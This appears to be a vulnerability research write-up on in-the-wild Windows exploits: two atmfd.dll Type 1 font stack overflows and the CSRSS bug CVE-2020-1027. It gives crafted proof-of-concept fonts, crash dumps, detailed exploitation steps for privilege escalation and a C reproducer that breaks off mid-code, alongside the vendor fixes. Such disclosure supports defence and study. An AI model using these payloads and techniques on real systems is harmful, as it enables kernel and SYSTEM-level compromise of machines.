The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[2];
  Fixed16_16 values[2];
  for (int i = 0; i < g_font->numMasters; i++) {
    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];
  }
  for (int i = 0; i < 2; i++) {
    int values_read = GetOpenFixedArray(values, g_font->numMasters);
    if (values_read != g_font->numMasters) {
      return -8;
    }
    for (int num = 0; num < g_font->numMasters; num++) {
      ptrs[num][i] = values[num];
    }
  }
  return 0;
}

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0 and 16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

...
RSP + 0x30    ptrs[0]
RSP + 0x38    ptrs[1]
RSP + 0x40    saved RDI
RSP + 0x48    return address
RSP + 0x50    values[0 .. 1]
RSP + 0x58    saved RBX
RSP + 0x60    saved RSI
...

In this layout, ptrs and values are the user-controlled local arrays, while the saved registers and the return address are internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/WeightVector [0 0 0 0 0] def
/Private begin
/Blend begin
/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]
/end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile
cleartomark

The /WeightVector line sets numMasters to 5, and the /VToHOrigin line triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (encoded as 16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 0000000000000002, (reserved)
[...]
TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141
rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000
 r8=0000000000000000  r9=000000000000000e r10=0000000000000000
r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po cy
ATMFD+0x22144:
fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????
Resetting default scope

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];
  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }
  SetNumMasters(num_master);
  for (int i = 0; i < num_master; i++) {
    procs->BlendDesignPositions(i, &values[i]);
  }
  return 0;
}

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]
/Private begin
/Blend begin
/end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile
cleartomark

In the /BlendDesignPositions line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xffffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher up the call stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.
Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 0000000000000002, (reserved)
[...]
TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000
rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000
rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002
 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000
r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
ffffffff`41414141 ??              ???
Resetting default scope

Exploitation

According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000
PXE at FFFFF6FB7DBEDF90
contains 0000000115879863
pfn 115879    ---DA--KWEV
PPE at FFFFF6FB7DBF2000
contains 0000000115878863
pfn 115878    ---DA--KWEV
PDE at FFFFF6FB7E400000
contains 0000000115877863
pfn 115877    ---DA--KWEV
PTE at FFFFF6FC80000000
contains 8000000115976863
pfn 115976    ---DA--KW-V
As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.
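
For illustration, the fixed page-table layout means the address of the PTE mapping a given virtual address is a pure function of that address. The sketch below assumes the non-randomized x64 PTE base of 0xFFFFF68000000000 used by these older kernels (an assumption consistent with the address quoted above) and reproduces the 0xfffff6fbc0000004 value for the shared user data page.

#include <stdint.h>
#include <stdio.h>

/* Non-randomized x64 PTE self-map base (assumption consistent with the
   0xfffff6fbc0000004 address quoted above). */
#define PTE_BASE 0xFFFFF68000000000ULL

/* Address of the PTE that maps a given virtual address. */
static uint64_t pte_address(uint64_t va) {
  return PTE_BASE + ((va >> 12) & 0xFFFFFFFFFULL) * 8;
}

int main(void) {
  uint64_t shared_user_data = 0xFFFFF78000000000ULL;
  uint64_t pte = pte_address(shared_user_data);
  /* The NX bit is bit 63 of the 64-bit PTE, i.e. the top bit of the high
     32-bit half at pte + 4 -- matching the exploit's single 32-bit write
     of 0 to 0xfffff6fbc0000004. */
  printf("PTE at %#llx, high dword at %#llx\n",
         (unsigned long long)pte, (unsigned long long)(pte + 4));
  return 0;
}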

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[16];
  Fixed16_16 values[16];
  if (g_font->numMasters > 0x10) {
    return -4;
  }
  [...]
}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];
  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    if (num_master >= 16) {
      return -4;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }
  [...]
}

2. CSRSS issue on Windows 10 (CVE-2020-1027)

Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(
    PCSR_API_MSG ApiMessage,
    PVOID CaptureBuffer,
    ULONG ApiNumber,
    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of the CSRSS modules, sxssrv.dll, implements support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">

  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"

      version="1.0.0.0" processorArchitecture="x86"/>

  <dependency>

    <dependentAssembly>

      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"

          version="2.5.0.0" processorArchitecture="x86"/>

    </dependentAssembly>

  </dependency>

</assembly>

The bug

The vulnerability in question has been discovered in the routine sxssrv!BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context; the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {
  if (StringField = StringFields[i]) {
    Length = StringField->Length;
    if (Length && !StringField->Buffer ||
        Length > StringField->MaximumLength || Length & 1)
      return 0xC000000D;
    if (StringField->Buffer) {
      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,
                                    Length + 2, 1)) {
        DbgPrintEx(0x33, 0,
                   "SXS: Validation of message buffer 0x%lx failed.\n"
                   " Message:%p\n"
                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",
                   i, ApiMessage, StringField, StringField->Length,
                   StringField->MaximumLength, StringField->Buffer);
        return 0xC000000D;
      }
      CharCount = StringField->Length >> 1;
      if (StringField->Buffer[CharCount] &&
          StringField->Buffer[CharCount - 1])
        return 0xC000000D;
    }
  }
}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(
    PCSR_API_MSG ApiMessage,
    PVOID* Buffer,
    ULONG ElementCount,
    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.
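
In rough pseudo code, the three checks look something like the sketch below; the structure and names here are assumptions based on the description above, not decompiled CSRSS code.

#include <stdint.h>

/* Sketch of the three validation steps described above (names assumed). */
typedef struct {
  char *base;    /* start of the capture buffer */
  uint64_t size; /* total size of the capture buffer */
} CAPTURE_BUFFER;

int ValidateMessageBuffer(const CAPTURE_BUFFER *cb, void **buffer,
                          uint32_t count, uint32_t element_size) {
  char *p = (char *)*buffer;
  /* check 2: the 32x32-bit product cannot overflow 64 bits */
  uint64_t total = (uint64_t)count * element_size;
  if (p < cb->base)                      /* check 1: starts inside the buffer */
    return 0;
  uint64_t offset = (uint64_t)(p - cb->base);
  if (offset > cb->size || total > cb->size - offset)
    return 0;                            /* check 3: ends inside the buffer */
  return 1;
}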

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:

sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity
sxs!CNodeFactory::CreateNode
sxs!XMLParser::Run
sxs!SxspIncorporateAssembly
sxs!SxspCloseManifestGraph
sxs!SxsGenerateActivationContext
sxssrv!BaseSrvSxsCreateActivationContextFromStructEx
sxssrv!BaseSrvSxsCreateActivationContext

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;
if (BufferCapacity) {
  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;
  GenActCtxParams.ApplicationNameBuffer =
      CreateCtxParams->ApplicationName.Buffer;
} else {
  GenActCtxParams.ApplicationNameCapacity = 60;
  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);
  if (!StringBuffer) {
    Status = 0xC0000017;
    goto error;
  }
  GenActCtxParams.ApplicationNameBuffer = StringBuffer;
}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);
if (Context) {
  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);
} else {
  FusionpTraceAllocFailure(v14);
  SetLastError(0xE);
  goto error;
}
if (GenActCtxParams->ApplicationNameBuffer &&
    GenActCtxParams->ApplicationNameCapacity) {
  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;
  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;
}

Ultimately, sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity calls a memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;
IdentityNameLength = 0;
SetLastError(0);
if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,
                                           &IdentityNameBuffer,
                                           &IdentityNameLength)) {
  CallSiteInfo = off_16506FA20;
  goto error;
}
if (IdentityNameLength &&
    IdentityNameLength < Context->ApplicationNameCapacity) {
  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,
         2 * IdentityNameLength + 2);
  Context->ApplicationNameLength = IdentityNameLength;
} else {
  *Context->ApplicationNameBuffer = 0;
  Context->ApplicationNameLength = 0;
}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.

Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB". The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {
  LIST_ENTRY InLoadOrderModuleList;
  LIST_ENTRY InMemoryOrderModuleList;
  LIST_ENTRY InInitializationOrderModuleList;
  PVOID BaseAddress;
  PVOID EntryPoint;
  ULONG SizeOfImage;
  UNICODE_STRING FullDllName;
  UNICODE_STRING BaseDllName;
  ULONG Flags;
  SHORT LoadCount;
  SHORT TlsIndex;
  LIST_ENTRY HashTableEntry;
  ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls. A user-mode sketch of walking this module list is shown after these steps.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.
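
Returning to step 3, the loaded module list that the exploit overwrites is an ordinary doubly-linked list hanging off the PEB. The following user-mode sketch walks the current process’s own list using only the partial definitions winternl.h exposes (InMemoryOrderModuleList rather than InLoadOrderModuleList, since that is the member the header makes available); it illustrates the data structure, not the attack.

#include <windows.h>
#include <winternl.h>
#include <stdio.h>

/* Walk the current process's loaded module list via the PEB. This is the
   list whose head the exploit swaps for a fake one inside csrss.exe. */
int main(void) {
  PPEB peb = NtCurrentTeb()->ProcessEnvironmentBlock;
  LIST_ENTRY *head = &peb->Ldr->InMemoryOrderModuleList;
  for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) {
    LDR_DATA_TABLE_ENTRY *mod =
        CONTAINING_RECORD(e, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    wprintf(L"%.*s @ %p\n",
            (int)(mod->FullDllName.Length / sizeof(WCHAR)),
            mod->FullDllName.Buffer, mod->DllBase);
  }
  return 0;
}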

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;
if (ApplicationName.MaximumLength &&
    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,
                              ApplicationName.MaximumLength, 1)) {
  SavedMaximumLength = ApplicationName.MaximumLength;
  ApplicationName.MaximumLength = ApplicationName.Length + 2;
}
[...]
if (SavedMaximumLength)
  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =
      SavedMaximumLength;
return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>
#include <stdio.h>
#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =
    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"
    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"
    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "
    "processorArchitecture='amd64'/>"
    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";
const WCHAR* MANIFEST_NAME =
  L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"
  L"d761caeca23d64a2.manifest";
const WCHAR* PATH = L"\\\\.\\c:Windows\\";
const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,
                                                     ULONG BufferSize);
f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,
                                                   PVOID CaptureBuffer,
                                                   ULONG ApiNumber,
                                                   ULONG DataLength);
f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,
                                                       PCSTR String,
                                                       ULONG Length,
                                                       ULONG MaximumLength,
                                                       PSTR OutputString);
f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,
                              PCWSTR String, ULONG Length = 0) {
  if (Length == 0) {
    Length = lstrlenW(String);
  }
  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,
                                 Length * 2 + 2, OutputString);
}

int main() {
  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");
  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(
      Ntdll, "CsrAllocateCaptureBuffer");
  CsrClientCallServer =
      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");
  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(
      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];
  memset(Message, 0, 0x220);
  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;
  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.
  // The offsets and values are taken directly from the exploit.
  *(uint32_t*)(Message + 0x40) = 0xc1;
  *(uint16_t*)(Message + 0x44) = 9;
  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;
  // therefore, it doesn't have to be stored in the capture buffer.
  *(const char**)(Message + 0x80) = Manifest.c_str();
  *(uint64_t*)(Message + 0x88) = Manifest.size();
  *(uint64_t*)(Message + 0xf0) = 1;

